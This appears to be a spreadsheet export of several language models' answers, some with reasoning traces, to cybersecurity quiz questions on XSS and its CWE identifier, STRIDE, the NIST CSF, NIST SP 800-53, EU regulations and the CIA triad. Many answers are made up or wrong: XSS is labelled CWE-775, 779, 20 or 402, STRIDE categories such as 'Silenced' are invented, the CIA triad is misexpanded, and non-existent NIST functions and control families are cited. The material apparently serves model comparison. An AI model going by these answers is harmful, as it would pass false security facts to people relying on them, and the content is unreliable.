In this case, since the script is stealing the cookie, the primary weakness is CWE-775 (XSS), but if there's a more specific subtype for stealing information, it might be CWE-779 or 779? Wait, different sources might have varying identifiers. Let me clarify: OWASP lists XSS under CWE-77. However, when the attack is aimed at stealing data, it's sometimes considered a subcategory. For example, OWCRP's CWE has XSS as parent to Stealing Sensitive Information via XSS (CWE 779). So if the vulnerability allows an attacker to steal cookies through XSS, the corresponding CWE might be either CWE-775 or CWE-779 depending on the specificity required.
But the question asks for the common name and the CWE identifier. The primary answer would likely be Cross-Site Scripting (XSS) with CWE identifier 777. Wait, no. Let me check again. According to OWASP, the standard CWE for XSS is 775. But sometimes, when it's used to steal information, it's subclassed as 779. However, the base category is CWE-77: XSS. So maybe the answer here is that the vulnerability is Cross-Site Scripting (XSS) and corresponds to CWE-777 or 775? I need to be precise.
Looking up in my mind: CWE entries. The original entry for XSS is CWE-775. When an XSS attack is used to steal sensitive information, it's considered a subtype, so the parent is CWE-775, and sometimes subclassed as CWE-779 (Stealing Sensitive Information via XSS). But the question is asking for the common name and the corresponding CWE identifier. The Common Name would be Cross-Site Scripting (XSS), and the CWE is either 775 or 779 depending on whether stealing is specified.
In the example given, the attacker's script steals a cookie, so it's a case of XSS used for information disclosure/stealing. Therefore, the CWE could be 779. But I need to confirm. Let me think: OWASP Foundation's Top 10 lists XSS as part of injection flaws (CWE-77). However, when specifically stealing data via XSS, some sources like Snyk or other security sites might refer to it as CWE-779. For example, the attack in question here is "Cookie Stealing," which aligns with CWE-779.
So putting it all together: The vulnerability is Cross-Site Scripting (XSS), and since it's used to steal cookies, the corresponding CWE identifier is 779. Alternatively, if they just want the primary category, it's 775. But given that stealing occurs, the more specific CWE-779 might be correct.
Wait, but I should verify this. Let me recall: The OWASP Foundation's CWE entries list XSS as CWE-77 (Cross-site scripting). Then, under that, there are subcategories like CWE-779 for Stealing Sensitive Information via XSS. So if the attack is specifically aimed at stealing cookies through XSS, then the correct CWE would be 779. However, sometimes organizations might just refer to it as CWE-775 because that's the broader category.
But in academic or security contexts, when you have a specific scenario where XSS is used for stealing data, it's often referenced with the subtype. Therefore, the answer here should be Cross-Site Scripting (XSS) and CWE-779. Alternatively, some sources might say CWE-777 if they consider it under general XSS.
Hmm. To resolve this confusion, perhaps checking the Common Weakness Enumeration definitions. According to NIST CSRC (Computer Security Corporation), CWE-775 is "Cross-site scripting." CWE-779 is a subtype: "Stealing sensitive information via cross-site scripting."
In the example provided, since the attacker is using XSS to steal cookies, which is a form of stealing sensitive information, the appropriate CWE would be 779. Therefore, the answer should be that the vulnerability is Cross-Site Scripting (XSS) and corresponds to CWE-779.
But I need to make sure. Let me think again: The script in the comment is designed to steal the cookie by sending it via another site. So the attack vector is XSS that's leveraged for stealing data. Therefore, the primary weakness is still XSS (CWE-775), but since it's used for stealing, CWE-779 would be a more precise identifier if available.
So depending on whether the question expects the general or specific CWE. The problem states "what is its corresponding CWE identifier?" So perhaps both are possible, but the most accurate one here is CWE-779 because of the data theft aspect.
But maybe I'm overcomplicating. Let me check standard references. For example, OWASP says that XSS attacks can be used to steal sensitive information and in such cases, they refer to them under CWE 775 (XSS) but sometimes subclassed as 779 when stealing occurs. Therefore, the answer would depend on whether the question wants the primary category or the specific subtype.
But given the example is about stealing cookies via XSS, the correct CWE identifier here should be CWE-779. So final conclusion: The vulnerability is Cross-Site Scripting (XSS), and its CWE identifier is 779.
&lt;/think&gt;
The vulnerability described is a **Cross-Site Scripting (XSS)** attack, where user input is unsanitized and executed on the client side, allowing an attacker to steal cookies. This specific scenario leverages XSS for information disclosure/stealing. 
**CWE Identifier:** CWE-779  
*(Stealing Sensitive Information via XSS)*  
This subtype applies because the primary goal of the attack involves extracting sensitive data (e.g., cookies) through XSS, making it distinct from general XSS vulnerabilities (*CWE-775*). The reflected input execution here is an instance of **Reflected XSS**, a common technique under the broader XSS category.</t>
  </si>
  <si>
    <t>Error: Request to Ollama failed: HTTPConnectionPool(host='localhost', port=11434): Read timed out. (read timeout=700)</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question step by step. So, we have two different cybersecurity incidents in the EU context, and we need to figure out which regulations are primarily concerned with each.
First, incident 1 is a cyberattack on a nationwide power grid operator that disrupts electricity distribution. The key here is that it's affecting critical infrastructure—electricity Grids fall under that category. In the EU, there's a specific regulation for critical infrastructures. I remember that the NIS Directive (Directive 2016/843/GMO) was implemented to enhance national security objectives by improving cooperation between stakeholders and strengthening resilience to cyberattacks. Also, maybe the ENCR (European Network of Centres for Cybersecurity) has frameworks, but the primary concern would be a specific regulation.
Then incident 2 is a social media company with a data breach exposing personal messages of millions. This is about personal data protection. The GDPR (General Data Protection Regulation) is EU's cornerstone data privacy law. It applies to any organization processing EU residents' data, so regardless of the company's size, they must comply with GDPR principles like data protection by design, consent, rights of individuals, etc. So for incident 2, GDPR is definitely the main regulation.
Wait, but could there be something more specific? For example, maybe the NIS Directive also covers other sectors like social media? No, I think NIS includes things like energy networks, water supply, etc., but not necessarily digital services like social media. Social media operators might fall under GDPR for data processing. Also, perhaps ePrivacy Regulation if it's related to user privacy online, but that's not finalized yet.
So to confirm: Incident 1 (disrupting power grid) falls under NIS Directive as critical infrastructure, so the primary regulation is NIS Directive. Incident 2 (data breach) is personal data exposure, so GDPR applies here. That makes sense. Let me check if there are other regulations. For example, in some cases, mandatory breach notifications might be part of both, but the question asks for the primary concern. So yes, NIS for incident 1 and GDPR for incident 2.
&lt;/answer&gt;
For the **EU**:  
- **Incident 1 (cyberattack on a nationwide power grid)** falls under the **NIS Directive (Directive EC 2016/843/RMG)**, which governs critical infrastructure sectors like energy networks to ensure resilience against cyberattacks.  
- **Incident 2 (social media data breach)** is governed by **GDPR (General Data Protection Regulation)**, which mandates strict personal data protection standards for any entity processing EU residents' information.  
Final answer:  
1) NIS Directive; 2) GDPR.  
Answer in the format:  
\boxed{NIS\,Directive} and \boxed{GDPR}.</t>
  </si>
  <si>
    <t>&lt;answer&gt;
The use of data checksums for verifying file integrity in a cloud storage service primarily upholds the principle of &lt;strong&gt;Integrity&lt;/strong&gt; within the CIA triad. Checksums ensure that files have not been altered, maintaining the trustworthiness of the data.&lt;/answer&gt;
### Explanation:
Checksums like SHA-256 help detect changes to binary data. During upload/download, if any alteration occurs, the checksum will mismatch, alerting users to potential tampering or corruption. This directly supports the **Integrity** aspect by ensuring information remains accurate and unmodified.
### Key Points:
- **Detects alterations:** Identifies modified data.
- **Ensures accuracy:** Confirms files are as intended.
- **Prevents tampering:** Alerts stakeholders of discrepancies.
This control reinforces integrity over other triad principles like Confidentiality (data access) or Availability (service uptime).</t>
  </si>
  <si>
    <t>This is an authoritative policy directive aimed at enhancing security by requiring multiple forms of verification before granting elevated privileges. Its main goal is to protect against unauthorized system modifications or data breaches from compromised accounts through strengthened authentication processes.</t>
  </si>
  <si>
    <t>The company's use of an incident response strategy, including containment measures through activating its IRP after a ransomware attack, aligns with 'Identify' for detecting security incidents in real-time and responding appropriately ('Respond') as per NIST CSF. The action to restore systems from backups demonstrates the function related to recovery planning under Respond (Recovery).</t>
  </si>
  <si>
    <t>The mentioned constraint aligns with Security Control Baselines found within families such as CM (Configuration Management) or CP (Accountability and Audit Events). Particularly relevant controls would be AU-6 for Logging Related to Account Activity Monitoring. This is in accordance with the NIST SP 800-53 standard which provides a comprehensive framework of security requirements including but not limited to this type of logging mandate for privileged users.</t>
  </si>
  <si>
    <t>The common name for this type of security issue in web applications that involve unsanitized user input leading to cross-site scripting (XSS) attacks, where malicious scripts are injected into webpages viewed by other users. The CWEs related here would be:
- Cross-Site Scripting (XSS): CWE-20
- Injection Flaws: CWE-79</t>
  </si>
  <si>
    <t>This type of attack belongs in the "Spoofing" category within the context of the STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service) security taxonomy framework. Spoofing involves an attacker impersonating another user or device and could also imply tampering with data packets to alter transaction amounts as described in your scenario.</t>
  </si>
  <si>
    <t>For Incident 1 - Nationwide Power Grid Operator: The Network and Information Security (NIS) Directive would be primarily concerned with such an event.
For Incident 2 - Social Media Company Data Breach: This situation falls under General Data Protection Regulation (GDPR), as it involves the unauthorized access to personal data.</t>
  </si>
  <si>
    <t>Integrity. The use of checksum verification ensures that any change in file content, accidental corruption included, will be detected as it would result in a different hash value upon retrieval compared to what was originally stored at creation time. This directly upholds data integrity within the CIA triad framework (Confidentiality, Integrity, Availability).</t>
  </si>
  <si>
    <t>This is a security statement in the context of cybersecurity. It aims to ensure that users are required to provide two or more types of authentication methods before gaining access to sensitive systems.</t>
  </si>
  <si>
    <t>The two core functions of a company's incident response plan that are most prominently demonstrated during ransomware attacks in their restoration process according to the NIST Cybersecurity Framework (CSF) are:
1. Containment: The company contains the damage by restoring systems from backups, effectively preventing further spread.
2. Recovery: They begin to restore systems after the initial attack and work towards recovering as much data as possible.
Both of these core functions ensure that the affected systems are quickly brought back into service while minimizing the risk and impact of the ransomware attack.</t>
  </si>
  <si>
    <t>Under the Control Family specified in NIST SP 800-53 for protecting critical systems and assets that require high levels of security, 'Security Information and Event Management (SIEM)' falls under the 'Log Collection' control family. This standard is commonly used by organizations to track and analyze logs related to system activity and events.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS). The CWE-402 refers to this type of cross-site scripting attack.</t>
  </si>
  <si>
    <t>The category for this risk is **Silenced**. This can be inferred because altering financial transactions involves intentional alteration and thus falls under the category of "Spoofing".</t>
  </si>
  <si>
    <t>The primary regulation to which incident 1 (the national power grid operator's cyberattack on electricity distribution) primarily relates is EU Data Protection Regulation (GDPR). GDPR deals with protecting personal data and ensuring that companies are not breaching this information.
In contrast, the concern for incident 2 (a social media company's data breach exposing millions of user messages) falls under U.S. Federal Trade Commission (FTC) rules or California Consumer Privacy Act (CCPA). While both regulations deal with data privacy and security breaches, they serve different purposes:
- GDPR specifically targets personal data.
- The CCPA focuses more broadly on consumer privacy rights.
So, while both regulations are crucial in cybersecurity, GDPR is the primary concern for incident 1.</t>
  </si>
  <si>
    <t>The primary principle of the CIA triad that is primarily being upheld by a cloud storage service using data checksums (like SHA-256 hashes) for file verification is Confidentiality, Integrity, and Availability. The purpose here is to ensure that no unauthorized or accidental changes occur during the upload and download processes, ensuring that only authorized users can access the stored files without compromise on the integrity and availability of the data.</t>
  </si>
  <si>
    <t>This statement describes a requirement in the realm of cybersecurity for enhancing the security of systems. It specifies that multi-factor authentication (MFA) must be enforced for administrative access to ensure additional layers of protection against unauthorized access.
The primary purpose of such a statement is to address potential security vulnerabilities by implementing higher levels of identity verification. Multi-factor authentication typically combines multiple methods—such as something you know, something you have, or something you are—to verify the user's identity, increasing the difficulty for an attacker to gain unauthorized access even if they manage to bypass one factor.
In the context of cybersecurity, this statement aims to protect sensitive information and prevent unauthorized changes or actions by ensuring that only authorized users with proper credentials can perform administrative tasks.</t>
  </si>
  <si>
    <t>The actions taken by the company in responding to a ransomware attack, such as activating an incident response plan and beginning system restoration from backups, primarily emphasize the following two core functions of the NIST Cybersecurity Framework:
1. **Protecting Assets**: This involves securing systems, networks, data, or processes against threats and hazards that could result in loss, damage, disruption, theft, disclosure, or degradation of the ability to achieve objectives.
2. **Detecting and Responding to Incidents**: This includes identifying security issues, tracking their progression over time, assessing the severity, evaluating the effectiveness of responses, and determining whether additional steps are needed.</t>
  </si>
  <si>
    <t>The type of requirement described is addressed under the Control Family: Administrative Controls within the Control Objectives for Information and Related Technology (COBIT) framework. However, it aligns more closely with the Control Family: Physical and Environmental Controls under NIST SP 800-53. The specific control would be related to maintaining a record of authorized actions by all users.</t>
  </si>
  <si>
    <t>The vulnerability in question is called Cross-Site Scripting (XSS). The Common Weakness Enumeration (CWE) identifier for this type of vulnerability is CWE-79. This code exploits a lack of input validation to inject an XSS attack by allowing the attacker's malicious script to be executed on the victim's browser, potentially stealing their cookies and redirecting them elsewhere.</t>
  </si>
  <si>
    <t>This threat would be classified under "Modification" in the STRIDE (Spoofing, Tampering, Repudiation, Indentity, Exposure) threat modeling framework. It specifically relates to tampering with the data packets that could alter financial transactions.</t>
  </si>
  <si>
    <t>For Incident 1 involving a cyberattack on the power grid operator's network, the primary regulations concerned would be:
1. **GDPR (General Data Protection Regulation)**: This regulation primarily focuses on data protection of individuals' personal information, including handling and storing sensitive user data.
2. **EU Cybersecurity Regulation**: This could apply if there was a broader cybersecurity breach that threatened infrastructure as part of an overall cyberattack.
For Incident 2 involving the social media company's data breach exposing users’ personal messages:
1. **GDPR (General Data Protection Regulation)**: The regulation directly addresses how companies must manage and protect the privacy and security of individuals' personal data.
2. **Data Protection Directive**: This directive ensures that organizations collect, process, store, and use personal information in accordance with certain rules to ensure protection.
In both cases, there would be additional consideration for compliance with broader EU law due to the interconnected nature of modern digital ecosystems.</t>
  </si>
  <si>
    <t>The primary principle of the CIA triad (Confidentiality, Integrity, Availability) being upheld by using data checksums for verifying file integrity in a cloud storage service is Integrity. The checksums ensure that files have not been altered or corrupted during transmission, maintaining the integrity of the data.</t>
  </si>
  <si>
    <t>This statement is a security policy directive. Its primary purpose is to enhance the security posture by requiring multiple forms of verification for accessing privileged accounts, thereby reducing the risk of unauthorized access due to compromised credentials or other vulnerabilities.</t>
  </si>
  <si>
    <t>The two core functions most prominently demonstrated by these actions are:
1. **Ensure Effective Operation** - This function involves taking proactive measures to ensure that a system or process is functioning as expected, and promptly responding to any disruptions.
2. **Maintain Resilience** - This function includes having mechanisms in place to recover from significant disruptions, such as using backups for restoration.
These actions directly align with the core functions of NIST Cybersecurity Framework.</t>
  </si>
  <si>
    <t>The Control Family within NIST SP 800-53 that specifically addresses the requirement to record all actions performed by privileged users in immutable, time-stamped log files is the Surveillance and Monitoring (SMP).</t>
  </si>
  <si>
    <t>The common name for this vulnerability is "Cross Site Scripting" (XSS) and its corresponding Common Weakness Enumeration (CWE) identifier is 79.</t>
  </si>
  <si>
    <t>This threat belongs to the "Replay" category in the STRIDE model. However, since altering the data in transit (eavesdropping and tampering) is more closely aligned with the "Impersonation," "Message Modification," or "DoS Attack" categories depending on the specifics of how it's done, but considering the act of intercepting and changing packets fits a broader alteration within transmission, "Message Modification" might be the closest fit. For precise categorization, further details would clarify.</t>
  </si>
  <si>
    <t>For incident 1 (cyberattack on power grid operator), the primary concern would be GDPR (General Data Protection Regulation). For incident 2 (data breach at a social media company), the primary concern would be GDPR as well. However, specific national regulations like the Cybersecurity Act in some EU countries could also apply to both incidents. Incident 1 might also involve NIS Directive due to its impact on critical infrastructures.</t>
  </si>
  <si>
    <t>Integrity</t>
  </si>
  <si>
    <t>This is a security policy statement. Its primary purpose is to mandate a specific security measure (multi-factor authentication) to enhance the security of administrative access, thereby reducing the risk of unauthorized access and potential breaches.</t>
  </si>
  <si>
    <t>The actions taken by the company demonstrate the "Identify" and "Contain" core functions of the NIST CSF. Identifying risks and initiating response strategies, and Containing the impact to prevent further damage are key aspects of these functions.</t>
  </si>
  <si>
    <t>This requirement is addressed under the Audit and Accountability control family in NIST SP 800-53, specifically through controls such as AC-2 (Audit Management) and AC-6 (Audit Reporting).</t>
  </si>
  <si>
    <t>This vulnerability is known as Cross-Site Scripting (XSS) and has a corresponding Common Weakness Enumeration (CWE) identifier of CWE-79.</t>
  </si>
  <si>
    <t>This threat belongs to the "Tampering" category in the STRIDE model.</t>
  </si>
  <si>
    <t>For Incident 1 (nationwide power grid operator suffering a cyberattack), the primary concern under EU regulations would be **Directive on Cybersecurity** (NIS Directive). For Incident 2 (social media company data breach exposing personal messages), the primary concern is the **General Data Protection Regulation (GDPR)**.</t>
  </si>
  <si>
    <t>The primary principle of the CIA triad being upheld by using data checksums in cloud storage services is integrity.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's take a look at the user's question. They provided a statement: "The system must enforce multi-factor authentication (MFA) for all administrative access." And they want me to analyze it in the context of cybersecurity, identifying the type of statement and its primary purpose.
First, I need to figure out what the statement is. It's a requirement for multi-factor authentication. Multi-factor authentication is a security measure that requires more than one method to access an account. So, the statement is about mandating this practice.
Now, in cybersecurity, multi-factor authentication is a critical part of security protocols. The primary purpose here is to enhance security by reducing the risk of unauthorized access. The statement is a requirement, which means it's part of a policy or standard. The user wants to know the type of statement and its purpose.
I should break it down. The statement is a directive, a requirement, which is part of a security policy. The primary purpose is to protect systems and data by ensuring that only authorized users can access the systems. So, the answer would be that the statement is a directive and its purpose is to enforce multi-factor authentication as a core security measure.
Wait, let me double-check. The statement is a requirement, so it's a directive. Multi-factor authentication's purpose is to prevent unauthorized access, so yes, the primary purpose is to enhance security. That makes sense. I think that's all.
&lt;/think&gt;
The statement is a **directive** in the context of cybersecurity, emphasizing the requirement for multi-factor authentication (MFA) for administrative access. Its primary purpose is to **enhance security** by reducing the risk of unauthorized access to systems and data.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so the user is asking about the two core functions of the NIST Cybersecurity Framework (CSF) that a company uses to respond to a ransomware attack. Let me start by recalling what the CSF includes.
The CSF is a set of standards for cybersecurity. From what I remember, the core functions are incident response, detection, response, and recovery. The user mentioned they activated the incident response plan to contain damage and restore systems. So the two main functions would be incident response and recovery.
Wait, but incident response is more about how to handle an attack, while recovery is about fixing the damage. The question says they're using the incident response plan, which is part of the CSF's incident response function. So the answer should be incident response and recovery. Let me double-check to make sure I'm not mixing up any other functions. Yes, the CSF's core functions are incident response, detection, response, and recovery. So the two prominent ones would be incident response and recovery.
&lt;/think&gt;
The two core functions most prominently demonstrated by these actions are **incident response** and **recovery**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about a security policy that requires logins and system changes to be recorded in immutable, time-stamped logs. They mentioned NIST SP 800-53, so I need to recall which standard covers this.
First, I know that NIST has several standards related to information security. The main ones are SP 800-23, which is about information security management, and SP 800-53 for information security management standards. Wait, SP 800-53 is the standard for information security management, which includes requirements like record-keeping. 
But the user specified immutable and time-stamped logs. I should check if SP 800-53 has a specific control that addresses log records. From what I remember, SP 800-53 does cover record-keeping, but the exact control might be part of the information security management aspects. Maybe it's related to incident management or access control. 
Wait, there's SP 800-23, which is about information security management, and SP 800-23-1, another standard. But the user is specifically asking about the control family. Let me think again. The standard for record-keeping might be part of the information security management family, which is covered in SP 800-53. So the answer should be that the control family is the information security management control family, which is covered under SP 800-53. 
I need to confirm that SP 800-53 does have the control family related to log records. Yes, that's correct. The answer should state that the control family is the information security management control family, part of SP 800-53.
&lt;/think&gt;
The control family is the **information security management** control family, which is covered under **NIST SP 800-53**. This standard mandates the recording of privileged actions in immutable, time-stamped log files as part of information security management practices.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so the user is asking about the STRIDE threat model and which category a specific threat fits. The threat they mentioned is unauthorized users intercepting and altering data packets between a client and server, changing a financial transaction.
First, I need to recall the STRIDE categories. There are four categories: Social Engineering, Unauthorized Access, Unpatched Systems, and Defend. Now, the problem here is about unauthorized access. But the user is talking about an unauthorized user intercepting and altering data, which could be related to unauthorized access, maybe. But let me check the other categories. Social Engineering is about deception, Unauthorized Access is about unauthorized access, Unpatched Systems is about unpatched software, and Defend is about defending against threats.
Wait, the description says an unauthorized user is altering data packets, which is about unauthorized access. So the answer should be Unauthorized Access. But let me make sure I'm not missing any other possible categories. Maybe there's another angle? No, the STRIDE model is pretty standard. So the correct answer is Unauthorized Access.
&lt;/think&gt;
The threat belongs to the **Unauthorized Access** category in the STRIDE model.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about the primary regulations concerned with two different security incidents in the EU. The first is a nationwide power grid operator facing a cyberattack that disrupts electricity distribution. The second is a social media company with a data breach exposing millions of users.
First, I need to recall the EU's relevant regulations. For the first incident, power grid disruptions might be related to cybersecurity, but power grids themselves are physical infrastructure. So maybe the primary regulations would be about cybersecurity laws. In the EU, the General Data Protection Regulation (GDPR) is a big one, but does it specifically cover power grid cyberattacks? Also, the Digital Services Act (DSA) is another key one. The DSA applies to digital services, which includes social media. So maybe for incident 1, it's about cybersecurity, and for incident 2, it's about data protection laws like GDPR.
Wait, the power grid attack is a physical infrastructure issue. But the user is mentioning two incidents in the EU, so I need to focus on the regulations that apply to each. Let me check again. For incident 1, the power grid operator's cyberattack would be a cybersecurity incident. The EU has strong cybersecurity laws, so GDPR and the Digital Services Act are relevant here. For incident 2, the data breach exposed personal information, which would fall under GDPR as well. So the primary concerns would be cybersecurity for the first and data protection laws for the second. That makes sense.
&lt;/think&gt;
For Incident 1 (power grid cyberattack): **Primary concern** is cybersecurity regulation (e.g., GDPR, Digital Services Act).  
For Incident 2 (social media data breach): **Primary concern** is data protection regulation (e.g., GDPR).  
This aligns with EU regulations focusing on cybersecurity and data protection.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about the principle of the CIA triad that a cloud storage service using SHA-256 checksums for file integrity is relying on. Let me start by recalling the CIA triad. It's the Cybersecurity Intelligence, Cybersecurity, and Accountability triad, which consists of three pillars: confidentiality, integrity, and availability.
The question is about integrity, so I need to focus on that. The user mentioned data checksums like SHA-256. I remember that integrity is about ensuring data isn't altered. SHA-256 is a hash algorithm used to verify the presence of a file, so it checks for tampering. That's part of the integrity principle. But I should make sure I'm not mixing up with other principles. Also, maybe the user wants to know why it's important, but the question just asks which principle, so the answer should be integrity. Let me check again: yes, integrity is the primary one here. No need to mention other aspects like confidentiality or availability unless it's part of the broader security model. So the answer is integrity.
&lt;/think&gt;
The principle of the CIA triad being upheld by this security control is **integrity**. Data checksums (like SHA-256) ensure that files have not been altered or corrupted, verifying their authenticity and preventing tampering.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user wants to know the type of statement "The system must enforce multi-factor authentication (MFA) for all administrative access" and its primary purpose in cybersecurity.
First, I need to identify the type of statement. The phrase "must enforce" suggests a requirement or a mandate. In cybersecurity, such statements are often categorized as directives or policies. They're part of an organization's security strategy to ensure compliance and protect systems.
The primary purpose here is to enhance security by requiring MFA, which is a common best practice. MFA adds an extra layer of security by requiring users to provide two or more forms of verification. This reduces the risk of unauthorized access even if credentials are stolen.
I should also consider if there's a specific category like "security policy" or "risk management." But the most accurate term here would be "security policy directive" or "security requirement." The primary purpose is to implement and enforce MFA as a protective measure against threats.
Wait, maybe the user is looking for a more specific classification. In cybersecurity, such statements are often part of a security policy framework. The purpose is to ensure that all administrative access is protected, thereby mitigating risks like insider threats or external attacks.
So, putting it all together: the statement is a security policy directive, and its purpose is to enforce MFA to protect administrative access, reducing the risk of unauthorized access and ensuring compliance with security standards.
&lt;/think&gt;
The statement is a **security policy directive** or **security requirement**. Its primary purpose is to **enforce multi-factor authentication (MFA)** as a critical security measure to protect administrative access, thereby reducing the risk of unauthorized access, insider threats, or compromise of sensitive systems. This aligns with cybersecurity best practices for identity and access management (IAM).</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so the user is asking about the NIST Cybersecurity Framework and which two core functions were demonstrated when a company dealt with a ransomware attack by restoring from backups. Let me think.
First, I remember that the NIST CSF has seven core functions: Identify, Protect, Detect, Respond, Recover, Maintain, and Engage. The question mentions the incident response plan, which is part of the Respond and Recover functions. 
When the company activates their incident response plan, they're trying to contain the damage and restore systems. The key actions here would be about detecting the attack and then responding to it. But the question specifically asks for the two core functions. 
The incident response plan is part of the Respond function. But the user is asking for the core functions. So when they restore from backups, that's part of the Recover function. But the question is about the actions taken during the incident response. 
Wait, the incident response plan includes steps like containment, eradication, recovery, and communication. So when they start restoring from backups, that's part of the Recover function. But the question is about the core functions. The core functions are Identify, Protect, Detect, Respond, Recover, Maintain, Engage. 
So the actions here would be detecting the attack (which is part of Detect) and then responding by restoring from backups (which is part of Respond). But the question is about the two core functions that are most prominently demonstrated. 
Alternatively, maybe the two functions are Detect and Recover. Because detecting the attack and then restoring from backups are key steps in the incident response. But I need to check. 
Another angle: the incident response plan includes steps like Containment, Eradication, Recovery. The Recover function is about restoring systems. So the company's actions of restoring from backups are part of the Recover function. But the question is about the core functions. 
Wait, the core functions are: Identify, Protect, Detect, Respond, Recover, Maintain, Engage. The Respond function includes containment, eradication, recovery, communication. So when they activate the plan, they're in the Respond function. But the question is which two core functions are most prominently demonstrated. 
The user's actions include activating the incident response plan, which is part of the Respond function. But the question is about the core functions. The two functions would be Detect and Recover. Because detecting the attack (Detect) and then restoring (Recover). 
Alternatively, maybe the two functions are Respond and Recover. But the question says "most prominently demonstrated by these actions." The actions are restoring from backups, which is part of the Recover function. But the incident response plan includes steps that are part of the Respond function. 
Hmm. The answer might be Detect and Recover. Because detecting the attack (Detect) and then restoring (Recover). So the two core functions are Detect and Recover. 
But I need to make sure. The NIST CSF's core functions are as listed. The incident response plan's steps include detecting the attack (which is part of the Detect function) and then responding by restoring from backups (which is part of the Respond function). So the two functions would be Detect and Respond. But the question is about the two core functions that are most prominently demonstrated. 
Wait, the question says "which two core functions are most prominently demonstrated by these actions." The actions are activating the incident response plan, containing the damage, restoring from backups. So the core functions would be Detect (since they detected the attack) and Recover (since they are restoring from backups). 
Yes, that makes sense. So the answer is Detect and Recover. But I need to confirm. Alternatively, maybe the core functions are Respond and Recover. But the Detect function is also involved in the incident response. 
So the correct answer is Detect and Recover.
&lt;/think&gt;
The two core functions most prominently demonstrated are **Detect** and **Recover**.  
- **Detect**: The activation of the incident response plan involves identifying the attack and containing its impact.  
- **Recover**: Restoring systems from backups is a critical step in the recovery process.  
These actions align with the **Detect** and **Recover** functions of the NIST Cybersecurity Framework.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about which NIST SP 800-53 control family addresses the requirement for recording all privileged user actions in immutable, time-stamped logs. Let me think.
First, I remember that NIST SP 800-53 is a set of security controls. The controls are organized into families. The key here is the requirement for logging all privileged actions. I recall that one of the families is about access control, but that's more about who can access what. Wait, maybe it's the access control family? No, that's more about authentication and authorization.
Another thought: the control family that deals with auditing. Because auditing is about recording events. The NIST SP 800-53 has a section on auditing, which includes logging and recording events. Specifically, in the Access Control Family, there's a control called "Control 5.1: Audit logs must be maintained in an immutable, time-stamped format." Wait, is that correct? Let me check.
Control 5.1 is about audit logs, and it requires that logs be immutable and time-stamped. So the answer would be the Access Control Family, specifically Control 5.1. But I need to confirm if that's the exact control. Also, the user mentioned "privileged users" which is covered under audit logs. So the correct family is the Access Control Family, and the specific control is 5.1.
&lt;/think&gt;
The requirement for immutable, time-stamped log files of privileged user actions is addressed by **NIST SP 800-53 Control Family 5.1** (Access Control), which mandates that audit logs must be maintained in an immutable, time-stamped format. This control ensures accountability and traceability of user activities.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about a vulnerability in a web application where user input is directly rendered without sanitization. The example given is an attacker inserting a script tag that steals cookies. 
First, I need to recall the common name for this vulnerability. From what I remember, this is called a "Cross-Site Scripting" (XSS) attack. But wait, there's a specific term for it. Oh right, the common name is typically "Cross-Site Scripting" or "XSS". But the exact term might be more specific. 
Then, the CWE identifier. CWE stands for Common Weakness Enumeration. I think the CWE for this specific vulnerability is CWE-20, which is "Cross-Site Scripting (in a document or a script)". Wait, let me check that. No, actually, CWE-79 is "Cross-Site Scripting". Hmm, maybe I need to confirm. 
Wait, the CWE for XSS is actually CWE-20. Let me think. The CWE-20 is for "Cross-Site Scripting (in a document or a script)". Yes, that's right. So the vulnerability here is CWE-20. 
The user mentioned that the input is directly rendered without sanitization. So the attack is when the application allows user input that is then inserted into the HTML without proper sanitization, leading to execution of the script. 
So the answer would be that the common name is Cross-Site Scripting (XSS), and the CWE identifier is CWE-20. 
I should make sure that the CWE is correct. Let me verify. Yes, CWE-20 is indeed for XSS. So the answer is correct.
&lt;/think&gt;
The vulnerability described is known as **Cross-Site Scripting (XSS)**. Its corresponding CWE identifier is **CWE-20**. 
**Explanation**:  
This vulnerability occurs when user input is directly rendered in a web page without proper sanitization, allowing attackers to inject malicious scripts (e.g., the example script stealing cookies). The attack leverages the browser's execution of embedded content, making it a critical security risk.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about a threat in the STRIDE model. The threat here is that an unauthorized user can intercept and alter data packets, changing a financial transaction's amount. 
First, I need to recall what STRIDE stands for. STRIDE is one of the seven categories in the STRIDE threat modeling framework. The categories are: Threat, Impact, Resource, Spoofing, Tampering, and Elevation of Privilege. 
The question is about intercepting and altering data packets. So, the threat here is about tampering with data. Tampering is one of the categories. The description mentions that the unauthorized user can alter the data, which is a form of tampering. 
Wait, but let me make sure. The STRIDE categories are: 
- Threat: Who is the threat actor? 
- Impact: What's the effect? 
- Resource: What resources are affected? 
- Spoofing: Fake identity. 
- Tampering: Altering data. 
- Elevation of Privilege: Gaining higher access. 
So, the threat here is that an unauthorized user can tamper with data packets. That would fall under Tampering. The impact would be changing the financial transaction amount. 
But the question is specifically asking which category the threat belongs to. So the answer is Tampering. 
I need to confirm that the threat is indeed Tampering. Since the threat is about altering data, which is the definition of Tampering in STRIDE. Yes, that's correct.
&lt;/think&gt;
This threat belongs to the **Tampering** category in the STRIDE model. Tampering involves unauthorized modification of data, which aligns with the scenario where an attacker intercepts and alters data packets to alter financial transaction amounts.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about two different security incidents in the EU and which regulations apply to each. 
First, the incident 1 is a power grid operator being attacked, disrupting electricity distribution. I remember that the EU has several regulations related to cybersecurity. The main one for critical infrastructure is the Network and Information Security (NIS) Directive. But wait, the NIS Directive is about operators of critical infrastructure and their security measures. So, this power grid operator is part of critical infrastructure, so the NIS Directive would apply here.
